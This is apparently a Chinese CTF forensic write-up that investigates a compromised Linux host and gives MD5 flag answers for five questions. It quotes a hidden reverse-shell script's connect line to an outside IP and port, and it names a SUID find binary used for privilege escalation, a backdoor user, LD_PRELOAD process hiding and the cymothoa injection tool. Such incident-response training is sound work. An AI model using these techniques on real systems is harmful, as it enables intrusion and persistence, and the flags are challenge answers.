# 题目 1

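黑客隐藏的文件的完整路径的 md5

注意:这里求的是路径字符串本身的 md5(不是文件内容),`echo -n` 用来去掉结尾的换行,否则哈希值会不同。目录名 libprocesshider 与同名的进程隐藏工具(通过 LD_PRELOAD 隐藏进程)一致,排查时可顺带检查 /etc/ld.so.preload。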

root@xuanji:~# echo -n "/tmp/.temp/libprocesshider/1.py" | md5sum
109ccb5768c70638e24fb46ee7957e37  -

flag: flag{109ccb5768c70638e24fb46ee7957e37}

# 题目 2

黑客隐藏的文件反弹 shell 的 ip + 端口 {ip:port}

root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py | grep connect
                sdregs.connect(("114.114.114.121",9999))

flag: flag{114.114.114.121:9999}

# 题目 3

黑客提权所用的命令 完整路径的 md5 flag {md5}

先查找带 SUID 位的文件。下面的结果中,除 /usr/bin/find 外都是系统默认带 SUID 的程序;find 默认不带 SUID 位,属于异常项,很可能是被人为设置后用于提权。

root@xuanji:/var/log# find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
root@xuanji:/var/log# echo -n "/usr/bin/find" | md5sum
7fd5884f493f4aaf96abee286ee04120  -

flag: flag{7fd5884f493f4aaf96abee286ee04120}

# 题目 4

黑客尝试注入恶意代码的工具完整路径 md5

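查看 /etc/passwd,发现有一个 ctf 用户,是后门用户,于是查找属于该用户的文件。/opt 下的隐藏目录 .cymothoa-1-beta 是 cymothoa(一款向已有进程注入 shellcode 的后门工具)的源码目录;可执行文件 cymothoa 本身没有出现在下面的输出中(推测其属主不是 ctf),可用 ls -la /opt/.cymothoa-1-beta 确认它存在。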

root@xuanji:/opt# find / -user ctf 2>/dev/null
/home/ctf
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/home/ctf/flag
/opt/.cymothoa-1-beta
/opt/.cymothoa-1-beta/Makefile
/opt/.cymothoa-1-beta/cymothoa.c
/opt/.cymothoa-1-beta/cymothoa.h
/opt/.cymothoa-1-beta/payloads/fork_shellcode.s
/opt/.cymothoa-1-beta/payloads.h
/opt/.cymothoa-1-beta/personalization.h
root@xuanji:/opt# echo -n "/opt/.cymothoa-1-beta/cymothoa" | md5sum
087c267368ece4fcf422ff733b51aed9  -

flag: flag{087c267368ece4fcf422ff733b51aed9}

# 题目 5

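使用命令运行 ./x.xx 执行该文件,将查询到的 Exec****** 值作为 flag 提交

下面的输出中 /usr/bin/python3 是符号链接,目标是相对路径 python3.4,补全后真实的可执行文件路径为 /usr/bin/python3.4。这里是直接解析符号链接得到答案(推测 ./x.xx 指前面的 1.py,由 python3 解释执行);更稳妥的做法是在脚本运行后查看对应进程的 /proc/<PID>/exe。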

root@xuanji:/opt/.cymothoa-1-beta# ls $(which python3) -al
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4

flag: flag{/usr/bin/python3.4}